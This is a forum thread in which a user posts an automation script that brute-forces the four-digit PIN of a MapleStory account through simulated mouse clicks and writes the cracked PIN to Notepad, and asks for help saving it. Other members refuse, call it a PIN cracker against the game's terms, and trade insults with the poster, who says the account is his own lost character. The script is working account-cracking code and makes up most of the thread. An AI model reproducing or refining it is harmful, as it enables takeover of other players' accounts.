Jump to content

HElp with this script


Recommended Posts

OK, This script works FINE!! All i need to know is how to make it save to notpad when it finds the correct pin. Ive altered the origional script so that it continously trys pins. Just wont save when it finds it. Can anyone help me out please let me know. Thanks

/ This line is necessary to select the proper window

SetActiveWindow

//Constants

Constants

One = 0

Two = 0

Three = 0

Four = 0

XCoordinate = 0

GuessTimes = 1

GuessTimes2 = 0

GuessTimes3 = 0

End

//Constants

Setactivewindow ggles.41.exe

Delay 5000 //You have 5 seconds to open MapleStory manually.

Loop $One = 0 to 9

Loop $Two = 0 to 9

Loop $Three = 0 to 9

Loop $Four = 0 to 9

Keys {SPACE}

Delay 100

Call ClickPIN $One //clicks number one

Call ClickPIN $Two //clicks number two

Call ClickPIN $Three //clicks number three

Call ClickPIN $Four //clicks number four

Delay 100

MousePos 530,370 //clicks Enter

LeftClick

Delay 100

//MousePos 466,338 = Cancel button

MousePos 390,333

LeftClick

Delay 1000

Compute GuessTimes = $Guesstimes + 1 //Track how many PINs were tried so far.

If $GuessTimes >99999999999999 //If we tried 4 pins so far, make it login again.

//Login again with username and password

Delay 500

Delay 500

Compute Guesstimes = 0

Compute GuessTimes2 = $GuessTimes2 + 1

End

//Check whether the PIN is correct...

IsBlue 233, 406

MousePos 290,247

Delay 5000

ExecProgram notepad.exe

Delay 20000

SetActiveWindow Untitled - Notepad

keys The PIN number of $CrackUser is:

keys {space}

keys $one $two $three $four

keys {keypad .}

Keys ^s //Save the file

Delay 200

Keys {del}

Keys Pinss2

Keys {return}

Stop //We logged in!

Else

MousePos 466,338 //presses Cancel

Continue

//Check whether you DCed...

IsRed 359, 738

Delay 5000

ExecProgram notepad.exe

Delay 20000

SetActiveWindow Untitled - Notepad

keys The PIN number wh#n you DCed is:

keys {space}

keys $one $two $three $four

keys {keypad .}

Keys ^s //Save the file

Delay 200

Keys {del}

Keys Pinss2 DC

Keys {return}

Stop //We DCed T_T

Else

Continue

End

End

End

End

End

End

//Procedures

Procedure ClickPIN using Number

Compute XCoordinate = ($Number * 23) + 277

MousePos $XCoordinate, 316 //Clicks the button with the number on it.

LeftClick

LeftClick

Delay 25

End

Procedure ChangePin&Cancel

MousePos 530,300 // Pin Enter

LeftClick

Delay 200

MousePos 306,337 // Pin Change

LeftClick

Delay 200

MousePos 455,339 // Pin Cancel

LeftClick

Delay 350

MousePos 999,999 // Needed Or It Glitches

LeftClick

Delay 350

MousePos 455,339 // Pin Cancel Confirm

LeftClick

Delay 500

LeftClick

Delay 1000

End

Link to comment
Share on other sites

This is an ACTool script for MapleStory and the purpose is Pin Crack which is against the EULA and TOS. Please GTFO and go somewhere else.

who cares generator go sck on something ( u can pick). and dont care if u say, "your mom".

TOS no one follows them anyway and if u knew something you would stfu cuz its actually for a character i lost. AS u can see there is no id and pass info to be inputed.

Link to comment
Share on other sites

who cares generator go sck on something ( u can pick). and dont care if u say, "your mom".

TOS no one follows them anyway and if u knew something you would stfu cuz its actually for a character i lost. AS u can see there is no id and pass info to be inputed.

How old are you? 7?

You come here to the Autoit V3 forum asking for help with something written in a language that (I Think) is Autoit V2 (However, I could be giving you too much credit, as it may not even be written in Autoit at all...)

And on top of that, the script isn't even positive, but a cheat for a game. and you start throwing "insults" at someone, like that would make us change our minds for helping you.

People actually do follow the TOS, I'm betting you will get banned / kicked / suspended for violating it sometime.

I agree with Generator.

Piss off and GTFO.

Edited by Paulie
Link to comment
Share on other sites

How old are you? 7?

You come here to the Autoit V3 forum asking for help with something written in a language that (I Think) is Autoit V2 (However, I could be giving you too much credit, as it may not even be written in Autoit at all...)

And on top of that, the script isn't even positive, but a cheat for a game. and you start throwing "insults" at someone, like that would make us change our minds for helping you.

People actually do follow the TOS, I'm betting you will get banned / kicked / suspended for violating it sometime.

I agree with Generator.

Piss off and GTFO.

I had no problem with you bro, this isnt for hacking the dam game. Im actually 18 and go to school for game design. lol.

Its just everytime someone see the dam thing ZOM hes HACKING. Its for a character that i lost , stolen by a close friend of mine which is an ass. I was simply asking a Q then he tells me to GTFO. Get the fuck out of here with that. peace.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...